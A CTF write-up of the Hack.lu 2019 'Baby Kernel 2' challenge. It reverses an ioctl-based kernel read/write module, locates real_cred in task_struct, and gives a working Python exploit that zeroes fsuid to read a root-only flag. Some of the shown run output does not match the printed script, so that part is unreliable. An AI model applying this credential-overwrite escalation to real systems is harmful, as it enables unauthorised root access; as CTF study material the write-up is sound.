Hack.lu 2019 - Baby Kernel 2 challenge writeup

Last October, I participated in the Hack.lu Capture The Flag with my team Securimag.

I wrote this writeup because none of the ones I've read explain how to reliably find the offset of real_cred in the task_struct structure that current_task points to.

I didn't have much time to spend on the CTF, and as I'm interested in exploitation, I quickly jumped on "Baby Kernel 2", as it was marked as easy and deals with the kernel.

Overview

The challenge provides a ZIP archive that contains multiple files:

vmlinux - A Linux kernel image (with symbols)
System.map - The symbol addresses for that kernel
initramfs.cpio.gz - The initial root filesystem
bzImage - Contains the bootloader and the stripped and compressed kernel
run.sh - A script to run the kernel with qemu

Note: In the archive I provide, I removed vmlinux as it is quite heavy and unnecessary, since System.map is given as well.

It is possible to extract the kernel from bzImage with the extract-vmlinux script from the Linux kernel source tree (scripts/extract-vmlinux). Alternatively, binwalk can extract it as well:

# Extract with extract-vmlinux
./extract-vmlinux ./bzImage > vmlinux
# Extract with binwalk
binwalk -e ./bzImage

Let's run it to see what it looks like:

./run.sh

...

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
>

Right after the Linux VM has booted, there's no shell to greet us, only a small program that asks us to pick an action.

Understanding everything

Since I was not doing the CTF to win, but rather just for fun, I decided to take the time to understand everything.

First of all, I decided to extract the default file system to see what was available on the system. To do so I used the following commands:

$ mkdir root
$ cd root
$ cp ../initramfs.cpio.gz ./
$ gunzip ./initramfs.cpio.gz
$ cpio -id < ./initramfs.cpio
7393 blocks
$ ls
bin  client_kernel_baby_2  etc  flag  home  init  initramfs.cpio  lib  proc  root  sys  usr  var
$

Now, to understand what this program that runs during startup is, I read the init file. There are many lines, but the most important ones are:

chmod 700 /flag
mkdir -p /lib/modules/$(uname -r)
insmod "/lib/modules/$(uname -r)/kernel_baby_2.ko"
chmod +rw /dev/flux_baby_2
chmod +x /client_kernel_baby_2
sleep 2
su user -c /client_kernel_baby_2

During init, the file /flag is restricted to read, write and execute permissions for user root only.
A kernel module, kernel_baby_2.ko, is loaded and its device /dev/flux_baby_2 is made readable and writable.
The file /client_kernel_baby_2 is made executable and is started as the user named user.
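
To make the chmod 700 line concrete, here is a small Python sketch that decodes the resulting mode bits. It assumes /flag is a regular file; the names FLAG_MODE and describe are only illustrative and nothing here touches the challenge files.

```python
import stat

# Mode applied by `chmod 700 /flag`, assuming /flag is a regular file.
FLAG_MODE = stat.S_IFREG | 0o700


def describe(mode):
    """Return the ls-style permission string for a mode."""
    return stat.filemode(mode)


print(describe(FLAG_MODE))  # -rwx------
```

Only the owner bits are set, so any process whose credentials do not match the owner gets no access at all.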

The client

Quickly, I decided to check what the client file does. In fact, I was intrigued as the challenge was supposed to be an easy kernel exploitation, but here only a userland application was available.

The binary is not stripped, so it is easy to understand what is happening. I disassembled the program with radare2. As we've seen above, there are 6 actions available, and actions 3 to 6 do what their names suggest:

Command 3 calls system("id");
Command 4 asks for a file name, then tries to open that file (for example /flag) and read its content.
Command 5 prints a hint.
Command 6 exits the program, which causes the system to halt.

So nothing surprising so far, but what do 1 and 2 do exactly? There are two unstripped functions in the binary, named do_read and do_write. They trigger an ioctl (request 901 for the read function, request 902 for the write function) with parameters read from the user input.

Alright, so I think it's time to disassemble the kernel module.

The kernel module

The kernel module is rather small, and not stripped. We can spot the function driver_ioctl and inspect it. It compares the ioctl request number with 901 and 902 and, on a match, calls the function read or _copy_from_user respectively, with the arguments supplied by the user.

The function read will use copy_to_user to read data from the kernel to userland, and copy_from_user is used to copy data from userland (our input program) into the kernel.

So now it's becoming clearer that we can interact with kernel land through the provided program.

Exploitation

So, the goal of the challenge is to read the /flag file but, as we've seen earlier, it is readable by root only. How can we do that? I think there are multiple ways of doing it, but here is the one I chose. Since it's not necessary to pop a shell or do anything too complicated, the only goal is to elevate the privileges of the current process to root.

Usually it is possible to do so by calling commit_creds(prepare_kernel_cred(0));. In our context, all we can do is read and write kernel memory. So let's see what the commit_creds function does.

int commit_creds(struct cred *new)
{
	struct task_struct *task = current;
	const struct cred *old = task->real_cred;

	/* ... */

	rcu_assign_pointer(task->real_cred, new);
	rcu_assign_pointer(task->cred, new);

	/* ... */

	/* release the old obj and subj refs both */
	put_cred(old);
	put_cred(old);
	return 0;
}

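The Linux kernel provides a macro, current, that evaluates to a pointer to the task_struct of the currently running process. On this kernel it is backed by the variable current_task (a struct task_struct *), which is the symbol we will look up later.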

Here the function commit_creds just updates the current->real_cred and current->cred pointers to the new credentials.

The task_struct structure is quite big, but has indeed the real_cred and cred members:

struct task_struct {
	/* ... */

	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;
	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;
	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

	/* ... */
};

The cred structure looks as follows:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;

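In the end, what we can do is simply overwrite members of the structure pointed to by real_cred, setting the user and group ids to 0 (root), until we manage to read the flag. In fact, it is only necessary to update the fsuid field, as it is the one that is checked when accessing a file on the filesystem. For a normal process, real_cred and cred point to the same struct cred, so a write made through real_cred also changes the credentials used for file access.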
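
As a sanity check on where fsuid sits, the start of struct cred can be mirrored with ctypes. This is only a sketch under stated assumptions: CONFIG_DEBUG_CREDENTIALS is disabled, __randomize_layout has no effect on this build, and atomic_t, kuid_t and kgid_t are each 4 bytes wide. CredPrefix is a hypothetical name that covers just the leading fields.

```python
import ctypes


class CredPrefix(ctypes.Structure):
    """Leading fields of struct cred (assumes no CONFIG_DEBUG_CREDENTIALS
    and no layout randomization)."""
    _fields_ = [
        ("usage", ctypes.c_int32),   # atomic_t wraps an int
        ("uid", ctypes.c_uint32),    # kuid_t wraps a 32-bit id
        ("gid", ctypes.c_uint32),    # kgid_t wraps a 32-bit id
        ("suid", ctypes.c_uint32),
        ("sgid", ctypes.c_uint32),
        ("euid", ctypes.c_uint32),
        ("egid", ctypes.c_uint32),
        ("fsuid", ctypes.c_uint32),
        ("fsgid", ctypes.c_uint32),
    ]


FSUID_OFFSET = CredPrefix.fsuid.offset
print(hex(FSUID_OFFSET))  # 0x1c
```

Under those assumptions fsuid lands at offset 0x1c (28), which is the 4 + 8*3 used in the exploit further down.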

With all of this understood, we have to find where those fields are located in memory. Luckily, we were provided with the System.map file, which contains all the symbols we need. In the original archive, vmlinux was also provided and already contained those symbols. The first thing the commit_creds function does is dereference current_task and access its real_cred member.

int commit_creds(struct cred *new)
{
	struct task_struct *task = current;
	const struct cred *old = task->real_cred;
	/* ... */
}

We can retrieve the address of commit_creds with a single grep command:

$ grep commit_creds ./System.map
ffffffff81050c50 T commit_creds
ffffffff816d4c80 r __ksymtab_commit_creds
ffffffff816dc9b2 r __kstrtab_commit_creds
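
The same lookup can be done programmatically. Below is a minimal Python sketch that parses System.map-style lines into a dictionary; parse_system_map is a hypothetical helper, and the sample lines are the three grep results shown above.

```python
def parse_system_map(lines):
    """Map symbol name -> (address, type) from System.map-style lines."""
    symbols = {}
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        addr, sym_type, name = parts
        symbols[name] = (int(addr, 16), sym_type)
    return symbols


sample = """\
ffffffff81050c50 T commit_creds
ffffffff816d4c80 r __ksymtab_commit_creds
ffffffff816dc9b2 r __kstrtab_commit_creds
""".splitlines()

symbols = parse_system_map(sample)
print(hex(symbols["commit_creds"][0]))  # 0xffffffff81050c50
```

Matching on the exact symbol name avoids picking up the __ksymtab_ and __kstrtab_ entries that a plain substring search returns. If a name appears more than once in a real System.map, this sketch keeps the last occurrence.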

And now check the disassembly inside radare2:

$ r2 ./vmlinux
[0x01000000]> pd 10 @ 0xffffffff81050c50
            0xffffffff81050c50      55             push rbp
            0xffffffff81050c51      4889e5         mov rbp, rsp
            0xffffffff81050c54      4155           push r13
            0xffffffff81050c56      4c8b2c2540a0.  mov r13, qword [0xffffffff8183a040]
            0xffffffff81050c5e      4154           push r12
            0xffffffff81050c60      53             push rbx
            0xffffffff81050c61      4d8ba5f80300.  mov r12, qword [r13 + 0x3f8]
            0xffffffff81050c68      4d39a5000400.  cmp qword [r13 + 0x400], r12
        ╭─< 0xffffffff81050c6f      0f85f1000000   jne 0xffffffff81050d66
        │   0xffffffff81050c75      8b07           mov eax, dword [rdi]

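As we can see, the value stored at current_task is loaded into r13 and then dereferenced at offset 0x3f8, so this offset corresponds to the real_cred pointer. The next instruction compares it with the pointer at offset 0x400, which is the cred member that follows it in task_struct. It is possible to automate this process with the following Python script: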

import r2pipe

# Address of current_task, taken from System.map
current_task_addr = 0xffffffff8183a040
MASK64 = (1 << 64) - 1

r2 = r2pipe.open('./vmlinux')
r2.cmd('s sym.commit_creds')
r2.cmd('aei; aeim')
usedreg = None
real_cred_offset = None
for _ in range(50):
    # Step instruction per instruction
    r2.cmd('aes')
    op = r2.cmdj('aoj 1 @ PC')[0]
    operands = op.get('opex', {}).get('operands', [])
    # Check for memory dereference
    if len(operands) == 2 and operands[1]['type'] == 'mem':
        mem = operands[1]
        # Get reg that contains the struct pointer
        # (mask the displacement in case it is reported as a signed value)
        if mem.get('disp', 0) & MASK64 == current_task_addr:
            usedreg = operands[0]['value']
            continue
        # If reg base is current_task, then get the offset
        if usedreg is not None and mem.get('base') == usedreg:
            real_cred_offset = mem['disp']
            break
if real_cred_offset is None:
    print('real_cred offset not found')
else:
    print(hex(real_cred_offset))
r2.quit()

And it prints the same offset! That's the only reliable way I found to quickly compute the right offset for real_cred, as it may vary across kernel versions and compilation options.

Now using either the vmlinux file (which already contains symbols) or the System.map file, we can get the address of current_task.

The exploit will be as follows:

Get current_task pointer
Get current->real_cred pointer
Overwrite current->real_cred->fsuid to 0
Print the flag
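
Before talking to the real VM, the pointer chase can be rehearsed against a fake memory image. The sketch below is only a model: FakeKernel is a hypothetical stand-in for the module's read/write primitive, the 8-byte access width is an assumption, and the task and cred addresses are sample values taken from a run of the exploit.

```python
import struct

CURRENT_TASK_ADDR = 0xffffffff8183a040  # from System.map
REAL_CRED_OFFSET = 0x3f8                # from the commit_creds disassembly
FSUID_OFFSET = 4 + 8 * 3                # usage, uid/gid, suid/sgid, euid/egid


class FakeKernel:
    """Hypothetical stand-in for the module's read/write primitive."""

    def __init__(self):
        self.mem = {}  # sparse, byte-addressed memory

    def write(self, addr, data):
        for i, byte in enumerate(data):
            self.mem[addr + i] = byte

    def read(self, addr, size):
        return bytes(self.mem.get(addr + i, 0) for i in range(size))

    def read64(self, addr):
        return struct.unpack('<Q', self.read(addr, 8))[0]

    def write64(self, addr, value):
        self.write(addr, struct.pack('<Q', value))


def make_fake_kernel(task=0xffff888003373480, cred=0xffff888003382480):
    """Build a memory image with one task whose ids are all 1000."""
    k = FakeKernel()
    k.write64(CURRENT_TASK_ADDR, task)
    k.write64(task + REAL_CRED_OFFSET, cred)
    # usage counter followed by the eight 32-bit uid/gid fields
    k.write(cred, struct.pack('<i8I', 1, *([1000] * 8)))
    return k


def escalate(k):
    """Follow current_task -> real_cred, then zero fsuid (and fsgid)."""
    task = k.read64(CURRENT_TASK_ADDR)
    cred = k.read64(task + REAL_CRED_OFFSET)
    k.write64(cred + FSUID_OFFSET, 0)
    return cred


k = make_fake_kernel()
cred = escalate(k)
# usage, uid, gid, suid, sgid, euid, egid, fsuid, fsgid
fields = struct.unpack('<i8I', k.read(cred, 36))
print(fields)
```

In this model an 8-byte write at the fsuid offset also clears fsgid, which sits right after it, while uid, gid and the other ids keep their original value.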

As the original challenge is hosted remotely, it's handy to expose our local VM over TCP so that it behaves like the remote target. I use the following trick, thanks to socat:

socat tcp-l:1337,reuseaddr,fork exec:"bash -c ./run.sh"

And we can create the following exploit:

#!/usr/bin/env python

import socket
import telnetlib  # note: removed from the standard library in Python 3.13


class Socket():
    def __init__(self, host, port):
        self.s = socket.create_connection((host, port))

    def recv(self, d): return self.s.recv(d)

    def send(self, d): return self.s.send(d)

    def recv_until(self, d):
        data = b''
        if type(d) == type(''):
            d = d.encode()
        while not data.endswith(d):
            tmp = self.s.recv(1)
            if not tmp:
                break
            data += tmp
        return data

    def recv_all(self):
        data = b''
        while True:
            part = self.s.recv(4096)
            data += part
            if len(part) < 4096:
                break
        return data

    def interact(self):
        t = telnetlib.Telnet()
        t.sock = self.s
        t.interact()


def plog(m):
    print('[+] ' + m)


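# Get symbols info from System.map
current_task_addr = None
for l in open('./public/System.map', 'r'):
    if l.split()[1:] == ['D', 'current_task']:
        current_task_addr = int(l.split()[0], 16)
if current_task_addr is None:
    # Fall back to the address seen in the commit_creds disassembly
    current_task_addr = 0xffffffff8183a040
# Offset of real_cred inside task_struct, recovered from commit_creds
real_cred_offset = 0x3f8
plog('Found current_task: 0x{:x}'.format(current_task_addr))
plog('Found real_cred_offset: 0x{:x}'.format(real_cred_offset))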


#############
# Exploit it!
print('-------------------')
plog('Connecting to remote VM...')
s = Socket('localhost', 1337)
s.recv_until(b'> ')
plog('VM Started!')

# 1. Get current_task_ptr
s.send(b'1\n')
s.recv_until(b'> ')
pl = hex(current_task_addr)[2:] + '\n'
s.send(pl.encode('utf-8'))
s.recv_until(b'power level is: ')
v = s.recv_until(b'\r\n')
current_task_ptr = int(v, 16)
plog('Found current_task pointer: 0x{:x}'.format(current_task_ptr))

# 2. Get real_cred_ptr
s.send(b'1\n')
s.recv_until(b'>')
pl = hex(current_task_ptr + real_cred_offset)[2:] + '\n'
s.send(pl.encode('utf-8'))
s.recv_until(b'power level is: ')
v = s.recv_until(b'\r\n')
real_cred_ptr = int(v, 16)
plog('Found real_cred pointer: 0x{:x}'.format(real_cred_ptr))

# 3. Overwrite fsuid with 0 (and fsgid too, if the write is 8 bytes wide)
s.recv_until(b'> ')
s.send(b'2\n')
s.recv_until(b'>')
addr = real_cred_ptr + 4 + 8*3 # 4 for usage, 8 for uid/gid, 8 for suid/sgid, 8 for euid/egid
s.send('{:x}\n'.format(addr).encode('utf-8'))
s.recv_until(b'>')
s.send(b'0\n')

# 4. Get userid
s.recv_until(b'> ')
s.send(b'3\n')
s.recv_until(b'\r\n')
userid = s.recv_until(b'\r\n')
plog('USER: {}'.format(userid.strip().decode()))

# 5. Go interactive
print(s.recv_all().decode())
s.interact()

Let's run it:

$ python solve.py
[+] Extracting symbols information from the binary...
[+] Found current_task: 0xffffffff8183a040
[+] Found commit_creds: 0xffffffff81050c50
[+] Found real_cred_offset: 0x3f8
-------------------
[+] Connecting to remote VM...
[+] VM Started!
[+] Found current_task pointer: 0xffff888003373480
[+] Found real_cred pointer: 0xffff888003382480
[+] USER: uid=1000(user) gid=1000(user) groups=1000(user)
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> 4
4
Which file are we trying to read?
> /flag
/flag
Here are your 0x10 bytes contents:
flag{fake_flag}

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> 6
6
flux_baby_2 closed
Bye!
ACPI: Preparing to enter system sleep state S5
reboot: Power down
*** Connection closed by remote host ***

Et voilà! Fun fact: as we only overwrite fsuid, the id command still reports our uid and gid as user (1000). However, since we only need file system access, that is enough to open /flag and read it.
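
Why changing fsuid alone is enough can be illustrated with a deliberately simplified model of the classic Unix permission check. This is a sketch, not the kernel's code: may_read is a hypothetical helper that ignores capabilities, ACLs and supplementary groups, and it assumes /flag is owned by root (uid 0, gid 0) with mode 700.

```python
import stat


def may_read(mode, file_uid, file_gid, fsuid, fsgid):
    """Simplified owner/group/other read check keyed on fsuid and fsgid."""
    if fsuid == file_uid:
        return bool(mode & stat.S_IRUSR)
    if fsgid == file_gid:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


FLAG_MODE = 0o700  # set by `chmod 700 /flag` in init

# Before the overwrite: the process runs as user (1000)
print(may_read(FLAG_MODE, 0, 0, fsuid=1000, fsgid=1000))  # False
# After the overwrite: fsuid is 0, so the owner bits apply
print(may_read(FLAG_MODE, 0, 0, fsuid=0, fsgid=0))        # True
```

The uid reported by id never enters this check, which is why the output above still shows uid=1000 while the flag is readable.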

Conclusion

I'd like to thank the creator of the challenge, as it was a nice way to get back to kernel exploitation.